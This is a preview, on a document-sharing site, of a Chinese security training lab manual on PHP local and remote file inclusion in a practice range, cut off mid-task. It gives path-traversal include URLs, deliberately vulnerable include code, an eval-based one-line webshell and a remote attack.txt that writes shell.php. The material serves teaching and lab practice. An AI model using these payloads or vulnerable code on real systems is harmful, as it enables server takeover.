版权说明:本文档由用户提供并上传,收益归属内容提供方,若内容存在侵权,请进行举报或认领
文档简介
寻真求是格物致知信息安全发展态势与知识拓展实训项目指导手册V1.0目录TOC\o"1-2"\h\u25852文件包含漏洞分析及利用 219763概述 224525实验环境 232043前提条件 216571实验流程 24481实验目标 216766任务1利用文件包含漏洞获取系统敏感信息 311401任务2利用本地文件包含获取网站控制权限 85268任务3利用远程文件包含获取网站控制权限 10
文件包含漏洞分析及利用概述PHP文件包含漏洞的产生原因是在通过PHP的函数引入文件时,由于传入的文件名没有经过合理的校验,从而操作了预想之外的文件,就可能导致意外的文件泄露甚至恶意的代码注入。文件包含漏洞分为:本地文件包含(LocalFileInclusion,LFI)和远程文件包含(RemoteFileInclusion,RFI)。LFI和RFI均通过PHP的包含函数即:require()、require_once()、include()和include_once()来使用。若PHP的配置选项allow_url_include设置为ON,则include/require函数即可加载远程文件,即会产生远程文件包含漏洞。本实验使用的靶场环境为:文件包含渗透靶场。实验环境攻击机:WindowsServer2016(01-Windows攻击机),IP:30靶机:WindowsServer2016(03-Windows靶机),IP:70前提条件本实验要求:熟悉Windows基本操作实验流程实验目标完成本实验后,您将能够:掌握利用文件包含漏洞获取Webshell的方法掌握文件包含漏洞的代码级防护方法任务1利用文件包含漏洞获取系统敏感信息【任务目标】构造文件包含语句,触发文件包含漏洞,并通过文件包含漏洞获取系统敏感信息。【任务步骤】靶场环境准备双击靶机桌面的”phpstudy”集成环境,并单击”启动”按钮,运行网站。攻击机访问靶机站点在攻击机打开浏览器访问http://<靶机IP>/app/rlfi.php包含正常文件在页面中,单击按钮,在URL地址栏中,即可看到通过language参数包含了一个lang_en.php的页面,并且将包含页面内容显示出来。此时在页面中,勾选下拉框,选择”Français”并单击按钮,在URL地址栏中,即可看到包含了一个lang_fr.php的页面,并且将包含页面内容显示出来。说明此处存在一个文件包含的功能。包含其他文件尝试包含靶机其他Web敏感文件。如:phpinfo.php(安装phpstudy默认存在此文件)、l.php(指针文件,安装phpstudy默认存在此文件)。构造如下包含语句:70/app/rlfi.php?language=../phpinfo.php&action=go由于phpinfo.php不在/app/文件夹下,所以需要通过../进行目录跳转。可以看到,phpinfo.php、l.php均可正常包含。继续构造包含语句,包含C:\Windows\win.ini系统文件:包含特殊文件在进行文件包含时,非php后缀文件中的php代码,同样会被解析。例如:在靶机的C:\phpStudy\PHPTutorial\WWW\app文件夹下,创建1.txt文件,并写入如下内容:<?phpphpinfo();?>接着,构造包含语句包含1.txt文件。可以看到,虽然包含的是1.txt文件,但是里面的php代码还是被服务器解析。说明此处存在文件包含漏洞。任务2利用本地文件包含获取网站控制权限【任务目标】通过文件包含漏洞,包含网站一句话木马文件,从而获得Webshell。【任务步骤】包含一句话木马继续编辑“任务1”的1.txt文件,加入一句话木马包含1.txt文件在攻击机打开浏览器包含1.txt文件。复制包含的URL路径,打开中国蚁剑进行连接。70/app/rlfi.php?language=1.txt&action=go右键添加的链接,单击“文件管理”,进入目标服务器文件管理界面。成功获得Webshell。任务3利用远程文件包含获取网站控制权限【任务目标】通过文件包含漏洞,包含远程一句话木马文件,从而获得Webshell。【任务步骤】配置远程包含环境在靶机中打开“phpStudy”集成环境,单击“切换版本”,勾选“php-5.4.45-nts+Apache”,将版本切换成支持远程文件包含的版本。接着,进入php-5.4.45-nts路径,编辑php.ini将allow_url_include设置为On。重启phpstudy网站环境,让修改的配置生效。在WWW/app文件夹下,创建rfi.php文件,并填写如下内容:<?php//存在RFI漏洞的代码片段$file=$_GET['file'];include$file;?>包含远程文件在攻击机中,打开”phpStudy”集成环境,并单击”启动”按钮,开启网站环境。在攻击机网站根目录中,创建attack.txt,并写入<?phpphpinfo();?>。在攻击机中,打开浏览器,构造如下包含语句:70/app/rfi.php?file=30/attack.txt可以看到,通过远程包含漏洞,将攻击机上attack.txt中的php代码成功解析出来。说明远程文件包含漏洞利用成功。包含远程文件并获取Webshell在攻击机中,继续编辑attack.txt,写入如下代码:123<?phpfputs(fopen("shell.php","w"),'<?php@eval($_POST["pass"]);?>');?>上述代码含义:生成一个shell.php文件
温馨提示
- 1. 本站所有资源如无特殊说明,都需要本地电脑安装OFFICE2007和PDF阅读器。图纸软件为CAD,CAXA,PROE,UG,SolidWorks等.压缩文件请下载最新的WinRAR软件解压。
- 2. 本站的文档不包含任何第三方提供的附件图纸等,如果需要附件,请联系上传者。文件的所有权益归上传用户所有。
- 3. 本站RAR压缩包中若带图纸,网页内容里面会有图纸预览,若没有图纸预览就没有图纸。
- 4. 未经权益所有人同意不得将文件中的内容挪作商业或盈利用途。
- 5. 人人文库网仅提供信息存储空间,仅对用户上传内容的表现方式做保护处理,对用户上传分享的文档内容本身不做任何修改或编辑,并不能对任何下载内容负责。
- 6. 下载文件中如有侵权或不适当内容,请与我们联系,我们立即纠正。
- 7. 本站不保证下载资源的准确性、安全性和完整性, 同时也不承担用户因使用这些下载资源对自己和他人造成任何形式的伤害或损失。
最新文档
- 2025-2026年人教版高二地理第5章世界地理综合练习题
- 2025-2026年浙江省苏教版八年级物理第2课运动和力的关系练习题
- 2025年湖南省苏教版九年级英语上册第5单元语法应用测试卷
- 2025-2026年四川省人教版三年级语文第1课小蝌蚪找妈妈同步练习题
- 尿管相关性感染与护理
- 2026年秋季小学班主任学生专注力培养管理课件
- 2026年秋季小学班主任新学期育人工作规划课件
- 2026年国庆中秋假期返校收心课件
- (正式版)DB13∕T 1085-2009 《无公害金莲花田间生产技术规程》
- 2026年荆钗布裙成语故事质朴品格公开课教案
- 2026秋初中数学华东师大版七年级上册(新教材)教学计划含进度表
- 2026年法院文员考试试题及答案真题
- 2026年甘肃省酒泉矿业投资集团有限公司招聘考试备考试题及答案详解
- 2026年秋苏教版新教材小学科学四年级上册教学计划及进度表
- 2026年云南省直机关遴选公务员笔试真题及答案解析
- 新版2026年秋教科版(新教材)小学科学四年级上册(全册)教学设计
- GJB3206B-2022技术状态管理
- 结婚函调报告表
- 生物高考真题卷-天津卷(含答案解析)
- 人教版小学一年级道德与法治上册全册教学完整课件
- DB64-T 1822-2022公路沥青面层典型结构应用技术规范
评论
0/150
提交评论